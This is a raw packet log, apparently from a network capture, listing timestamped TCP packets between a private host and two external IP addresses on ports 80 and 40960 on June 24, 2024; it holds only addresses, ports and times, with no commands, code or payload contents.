Jun 24, 2024 00:10:06.870078087 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:06.870112896 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:06.870121956 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:06.870150089 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:06.870163918 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:06.870165110 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:06.870193958 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:06.870194912 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:06.870227098 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:06.870242119 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:06.870260954 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:06.870270967 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:06.870304108 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:06.870759964 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:06.870815992 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:06.870826006 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:06.870867968 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:06.870871067 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:06.870903969 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:06.870913982 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:06.870940924 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:06.870949984 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:06.870985031 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:06.871594906 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:06.871660948 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:06.871663094 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:06.871722937 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:06.871752024 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:06.871787071 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:06.871802092 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:06.871825933 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:06.871831894 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:06.871871948 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:06.871875048 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:06.871928930 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:06.872425079 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:06.872474909 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:06.872477055 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:06.872524977 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:06.872567892 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:06.872602940 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:06.872616053 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:06.872636080 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:06.872648954 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:06.872679949 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:06.872680902 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:06.872725964 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:06.875614882 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:06.875678062 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:06.893553972 CEST	49707	40960	192.168.2.5	185.215.113.67
Jun 24, 2024 00:10:06.898869038 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:06.898957968 CEST	49707	40960	192.168.2.5	185.215.113.67
Jun 24, 2024 00:10:06.910304070 CEST	49707	40960	192.168.2.5	185.215.113.67
Jun 24, 2024 00:10:06.917207003 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:06.987551928 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:06.987618923 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:06.987652063 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:06.987656116 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:06.987687111 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:06.987695932 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:06.987704992 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:06.987739086 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:06.987749100 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:06.987782001 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:06.987797976 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:06.987816095 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:06.987828970 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:06.987848997 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:06.987859964 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:06.987881899 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:06.987893105 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:06.987915993 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:06.987926960 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:06.987960100 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:06.987970114 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:06.988015890 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:06.988173008 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:06.988221884 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:06.988240004 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:06.988274097 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:06.988285065 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:06.988308907 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:06.988318920 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:06.988351107 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:06.988353014 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:06.988399029 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:06.988629103 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:06.988662958 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:06.988691092 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:06.988698006 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:06.988706112 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:06.988742113 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:06.988780022 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:06.988811970 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:06.988831043 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:06.988845110 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:06.988857985 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:06.988893986 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:06.988997936 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:06.989028931 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:06.989046097 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:06.989070892 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:06.989080906 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:06.989114046 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:06.989136934 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:06.989147902 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:06.989156008 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:06.989181995 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:06.989195108 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:06.989227057 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:06.989234924 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:06.989268064 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:06.989284992 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:06.989303112 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:06.989312887 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:06.989336014 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:06.989346981 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:06.989370108 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:06.989387035 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:06.989414930 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:06.989938974 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:06.989989042 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:06.989995956 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:06.990031004 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:06.990041018 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:06.990063906 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:06.990075111 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:06.990106106 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:06.990115881 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:06.990149021 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:06.990165949 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:06.990187883 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:06.990200043 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:06.990231991 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:06.990248919 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:06.990267038 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:06.990276098 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:06.990300894 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:06.990314007 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:06.990334988 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:06.990345001 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:06.990376949 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:06.990809917 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:06.990849018 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:06.990864038 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:06.990895987 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:06.990900993 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:06.990933895 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:06.990952015 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:06.990967989 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:06.990978003 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:06.991013050 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:06.994297028 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:06.994349003 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:06.994412899 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:06.994462967 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.106070042 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.106194019 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.106230021 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.106270075 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.106285095 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.106345892 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.106379986 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.106416941 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.106434107 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.106434107 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.106434107 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.106468916 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.106471062 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.106471062 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.106503963 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.106529951 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.106537104 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.106555939 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.106571913 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.106605053 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.106606960 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.106627941 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.106638908 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.106662989 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.106673956 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.106703997 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.106726885 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.106733084 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.106760979 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.106781006 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.106801033 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.106815100 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.106833935 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.106856108 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.106867075 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.106890917 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.106900930 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.106920004 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.106935024 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.106956005 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.106970072 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.106996059 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.107003927 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.107024908 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.107037067 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.107050896 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.107070923 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.107103109 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.107105017 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.107129097 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.107129097 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.107140064 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.107157946 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.107173920 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.107196093 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.107209921 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.107230902 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.107244015 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.107265949 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.107278109 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.107304096 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.107311964 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.107326984 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.107350111 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.107368946 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.107378960 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.107414007 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.107424021 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.107448101 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.107448101 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.107465029 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.107481003 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.107498884 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.107515097 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.107533932 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.107547045 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.107575893 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.107597113 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.107603073 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.107636929 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.107661009 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.107670069 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.107685089 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.107703924 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.107723951 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.107737064 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.107745886 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.107769966 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.107791901 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.107805014 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.107826948 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.107836962 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.107860088 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.107872009 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.107887983 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.107904911 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.107929945 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.107939959 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.107963085 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.107974052 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.108001947 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.108009100 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.108021975 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.108043909 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.108063936 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.108078957 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.108098984 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.108123064 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.113130093 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.113183975 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.113195896 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.113219023 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.113240957 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.113251925 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.113270998 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.113286018 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.113303900 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.113318920 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.113337994 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.113373041 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.113373041 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.113405943 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.113432884 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.113440990 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.113456011 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.113473892 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.113492012 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.113507032 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.113526106 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.113558054 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.113569975 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.113611937 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.113622904 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.113646030 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.113670111 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.113682985 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.113687992 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.113718033 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.113737106 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.113751888 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.113773108 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.113784075 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.113807917 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.113817930 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.113841057 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.113851070 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.113878965 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.113890886 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.113917112 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.113924026 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.113939047 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.113957882 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.113991022 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.113996029 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.114020109 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.114025116 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.114043951 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.114057064 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.114070892 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.114090919 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.114110947 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.114141941 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.114145994 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.114178896 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.114201069 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.114214897 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.114237070 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.114268064 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.198204994 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.198271990 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.198276997 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.198309898 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.198326111 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.198354959 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.198364973 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.198405027 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.198414087 CEST	49706	80	192.168.2.5	77.91.77.81
